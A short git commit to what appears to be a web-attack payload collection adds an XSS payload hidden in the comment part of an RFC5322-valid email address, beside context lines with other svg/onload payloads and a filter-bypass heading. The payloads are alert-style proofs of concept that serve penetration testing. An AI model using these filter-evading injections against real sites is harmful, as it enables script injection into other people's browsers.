Add additional XSS payload in email addresses RFC5322

2024-12-18 18:36:10 +00:00 · 2024-05-31 13:27:32 +02:00 · 2024-05-31 13:27:32 +02:00 · fcf69f8226
commit fcf69f8226
parent b5251a673f
1 changed files with 7 additions and 1 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -783,6 +783,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 "><svg/onload=confirm(1)>"@x.y
 ```
 ([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/))
 ```javascript
 xss@example.com(<img src='x' onerror='alert(document.location)'>)
 ```
 ### Bypass document blacklist
 ```javascript